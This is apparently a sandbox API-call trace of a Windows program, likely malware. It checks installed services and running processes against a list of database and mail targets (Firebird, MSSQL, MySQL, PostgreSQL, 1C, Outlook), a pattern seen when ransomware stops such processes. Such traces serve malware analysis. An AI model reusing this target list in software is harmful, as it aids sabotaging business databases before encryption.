	[0041.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0041.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0041.929] lstrlenW (lpString="Dnscache") returned 8
	[0041.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0041.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0041.929] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0041.929] lstrlenW (lpString="DPS") returned 3
	[0041.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0041.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0041.929] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0041.929] lstrlenW (lpString="eventlog") returned 8
	[0041.929] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0041.929] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0041.929] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0041.930] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0041.930] lstrlenW (lpString="EventSystem") returned 11
	[0041.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0041.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0041.930] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0041.930] lstrlenW (lpString="gpsvc") returned 5
	[0041.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0041.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0041.930] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0041.930] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0041.930] lstrlenW (lpString="iphlpsvc") returned 8
	[0041.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0041.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0041.930] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0041.930] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0041.930] lstrlenW (lpString="LanmanServer") returned 12
	[0041.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0041.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0041.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0041.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0041.930] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0041.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0041.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0041.930] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0041.930] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0041.930] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0041.930] lstrlenW (lpString="lmhosts") returned 7
	[0041.930] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0041.930] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0041.931] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0041.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0041.931] lstrlenW (lpString="MMCSS") returned 5
	[0041.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0041.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0041.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0041.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0041.931] lstrlenW (lpString="MpsSvc") returned 6
	[0041.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0041.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0041.931] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0041.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0041.931] lstrlenW (lpString="Netman") returned 6
	[0041.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0041.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0041.931] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0041.931] lstrlenW (lpString="netprofm") returned 8
	[0041.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0041.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0041.931] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0041.931] lstrlenW (lpString="NlaSvc") returned 6
	[0041.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0041.931] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0041.931] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0041.931] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0041.931] lstrlenW (lpString="nsi") returned 3
	[0041.931] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0041.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0041.932] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0041.932] lstrlenW (lpString="PcaSvc") returned 6
	[0041.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0041.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0041.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0041.932] lstrlenW (lpString="PlugPlay") returned 8
	[0041.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0041.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0041.932] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0041.932] lstrlenW (lpString="Power") returned 5
	[0041.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0041.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0041.932] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0041.932] lstrlenW (lpString="ProfSvc") returned 7
	[0041.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0041.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0041.932] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0041.932] lstrlenW (lpString="RpcEptMapper") returned 12
	[0041.932] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0041.932] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0041.932] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0041.932] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0041.932] lstrlenW (lpString="RpcSs") returned 5
	[0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0041.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0041.933] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0041.933] lstrlenW (lpString="SamSs") returned 5
	[0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0041.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0041.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0041.933] lstrlenW (lpString="Schedule") returned 8
	[0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0041.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0041.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0041.933] lstrlenW (lpString="SENS") returned 4
	[0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0041.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0041.933] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0041.933] lstrlenW (lpString="ShellHWDetection") returned 16
	[0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0041.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0041.933] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0041.933] lstrlenW (lpString="Spooler") returned 7
	[0041.933] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0041.933] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0041.933] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0041.933] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0041.934] lstrlenW (lpString="SysMain") returned 7
	[0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0041.934] lstrlenW (lpString="Themes") returned 6
	[0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0041.934] lstrlenW (lpString="TrkWks") returned 6
	[0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0041.934] lstrlenW (lpString="UxSms") returned 5
	[0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0041.934] lstrlenW (lpString="VSS") returned 3
	[0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0041.934] lstrlenW (lpString="WdiServiceHost") returned 14
	[0041.934] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0041.934] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0041.934] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0041.934] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0041.935] lstrlenW (lpString="WdiSystemHost") returned 13
	[0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0041.935] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0041.935] lstrlenW (lpString="Winmgmt") returned 7
	[0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0041.935] lstrlenW (lpString="WPDBusEnum") returned 10
	[0041.935] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0041.935] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0041.935] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0041.935] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0041.935] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0041.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8
	[0041.937] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0041.938] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0041.938] lstrlenW (lpString="System") returned 6
	[0041.938] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0041.938] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0041.938] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0041.938] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0041.938] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0041.938] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0041.938] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0041.938] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0041.939] lstrlenW (lpString="smss.exe") returned 8
	[0041.939] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0041.939] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0041.939] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0041.939] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0041.939] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0041.939] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0041.939] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0041.939] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0041.940] lstrlenW (lpString="csrss.exe") returned 9
	[0041.940] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0041.940] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0041.940] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0041.940] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0041.940] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0041.940] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0041.940] lstrlenW (lpString="wininit.exe") returned 11
	[0041.940] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0041.940] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0041.940] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0041.941] lstrlenW (lpString="csrss.exe") returned 9
	[0041.941] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0041.941] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0041.941] lstrlenW (lpString="winlogon.exe") returned 12
	[0041.941] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0041.942] lstrlenW (lpString="services.exe") returned 12
	[0041.942] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0041.942] lstrlenW (lpString="lsass.exe") returned 9
	[0041.943] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0041.943] lstrlenW (lpString="lsm.exe") returned 7
	[0041.943] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.943] lstrlenW (lpString="svchost.exe") returned 11
	[0041.943] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.944] lstrlenW (lpString="svchost.exe") returned 11
	[0041.944] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.944] lstrlenW (lpString="svchost.exe") returned 11
	[0041.944] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.945] lstrlenW (lpString="svchost.exe") returned 11
	[0041.945] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.945] lstrlenW (lpString="svchost.exe") returned 11
	[0041.945] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0041.946] lstrlenW (lpString="audiodg.exe") returned 11
	[0041.946] Process32NextW (in: hSnapshot=0x1f8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0041.946] lstrlenW (lpString="svchost.exe") returned 11
